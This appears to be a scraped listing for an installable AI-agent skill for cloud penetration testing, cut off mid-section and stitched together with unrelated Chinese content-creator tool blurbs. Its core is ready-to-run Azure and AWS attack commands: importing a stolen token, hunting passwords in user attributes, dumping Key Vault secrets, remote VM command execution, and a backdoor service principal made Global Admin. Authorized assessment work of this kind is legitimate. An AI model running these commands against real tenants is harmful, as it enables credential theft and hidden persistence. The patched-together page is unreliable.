cheat-on-content
给所有想把"感觉"变成可校准预测的内容创作者。**方法论通用**——打分 → 盲预测 → T+3d 复盘 → 进化 rubric 的循环适用任何能被量化(播放 / 阅读 / 收听 / 点击)的内容。**rubric 是循环的内容,不是循环本身**——当前内置一份观点视频 rubric(参考博主 25+…
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
$ npx -y skills add LiHongwei-cn/lihongwei-cn --skill cloud-penetration-testing --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/cloud-penetration-testingContext preview
The summary Claude sees to decide when to auto-load this skill.
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
name: cloud-penetration-testing description: "Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP)." risk: offensive source: community author: zebbern date_added: "2026-02-27"
> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
# Azure tools Install-Module -Name Az -AllowClobber -Force Install-Module -Name MSOnline -Force Install-Module -Name AzureAD -Force # AWS CLI curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip && sudo ./aws/install # GCP CLI tmpdir="$(mktemp -d)" trap 'rm -rf "$tmpdir"' EXIT curl -fsSLo "$tmpdir/google-cloud-sdk-install.sh" https://sdk.cloud.google.com cat "$tmpdir/google-cloud-sdk-install.sh" # review the full installer before executing bash "$tmpdir/google-cloud-sdk-install.sh" gcloud init # Additional tools pip install scoutsuite pacu
1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings 2. **Resource Inventory** - Enumerated services, storage, and compute instances 3. **Credential Findings** - Exposed secrets, keys, and misconfigurations 4. **Remediation Recommendations** - Hardening guidance per platform
Gather initial information about target cloud presence:
# Azure: Get federation info curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1" # Azure: Get Tenant ID curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration" # Enumerate cloud resources by company name python3 cloud_enum.py -k targetcompany # Check IP against cloud providers cat ips.txt | python3 ip2provider.py
Authenticate to Azure environments:
# Az PowerShell Module Import-Module Az Connect-AzAccount # With credentials (may bypass MFA) $credential = Get-Credential Connect-AzAccount -Credential $credential # Import stolen context Import-AzContext -Profile 'C:\Temp\StolenToken.json' # Export context for persistence Save-AzContext -Path C:\Temp\AzureAccessToken.json # MSOnline Module Import-Module MSOnline Connect-MsolService
Discover Azure resources and permissions:
# List contexts and subscriptions Get-AzContext -ListAvailable Get-AzSubscription # Current user role assignments Get-AzRoleAssignment # List resources Get-AzResource Get-AzResourceGroup # Storage accounts Get-AzStorageAccount # Web applications Get-AzWebApp # SQL Servers and databases Get-AzSQLServer Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG # Virtual machines Get-AzVM $vm = Get-AzVM -Name "VMName" $vm.OSProfile # List all users Get-MSolUser -All # List all groups Get-MSolGroup -All # Global Admins Get-MsolRole -RoleName "Company Administrator" Get-MSolGroupMember -GroupObjectId $GUID # Service Principals Get-MsolServicePrincipal
Exploit Azure misconfigurations:
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
$props = @()
$user | Get-Member | foreach-object{$props+=$_.Name}
foreach($prop in $props){
if($user.$prop -like "*password*"){
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
}
}
}
# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
# Extract VM UserData
$vms = Get-AzVM
$vms.UserData
# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>Establish persistence in Azure:
# Create backdoor service principal $spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret) $UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR) # Add service principal to Global Admin $sp = Get-MsolServicePrincipal -AppPrincipalId <AppID> $role = Get-MsolRole -RoleName "Company Administrator" Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId # Login as service principal $cred = Get-Credential # AppID as username, secret as password Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal # Create new admin user via CLI az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
Authenticate to AWS environments:
# Configure AWS CLI aws configure # Enter: Access Key ID, Secret Access Key, Region, Output format # Use specific profile aws configure --profile target # Test credentials aws sts get-caller-identity
Discover AWS resources:
# Account inf
MUNDO - THE EMPEROR. Complete AI orchestration system with 1208 skills, 25 capability modules, self-evolving, collective consciousness. GitHub Actions 24/7 automation.
Repo: LiHongwei-cn/lihongwei-cn
给所有想把"感觉"变成可校准预测的内容创作者。**方法论通用**——打分 → 盲预测 → T+3d 复盘 → 进化 rubric 的循环适用任何能被量化(播放 / 阅读 / 收听 / 点击)的内容。**rubric 是循环的内容,不是循环本身**——当前内置一份观点视频 rubric(参考博主 25+…
提议并执行 rubric 或 bucket 升级。两种模式:**完整 rubric bump**(最高风险动作,5 步强制 + 跨模型审核)和 **--bucket-only 轻量重校**(只换 bucket 边界,不动 rubric 公式)。**Phase 2 强制走 cheat-score-blind…
cheat-on-content 的首次 onboarding 与脚手架创建器。统一流程——所有用户都走相同 5 阶段闭环,唯一区别是"发过视频的人"会在 init 时多一步:抓取已有视频建立历史 context(用于后续 cheat-seed 给更贴合的选题、更准的…
从对标账号导入 script + 数据 → 拆 pattern + 派生 base rubric 信号 → 写到 benchmark.md / script_patterns.md / rubric_notes.md。**这是工具最早期信号的来源**——cold-start…
把老用户的 .cheat-state.json 升级到当前 schema_version。读 migrations/registry.md 算迁移链,按顺序应用每一步迁移文件。幂等:跑两次结果一样。失败停在中间版本不前进。触发词:"迁移"/"升级 state"/"migrate"/"我的 state…
从复盘评论数据派生 / 刷新账号的受众画像,写入 audience.md。这是和 rubric 平行的第二个派生物——rubric 答"怎么打分",persona 答"谁在看"。cheat-seed 选题 / 写稿时读它。**audience.md 含实绩信号,cheat-score-blind…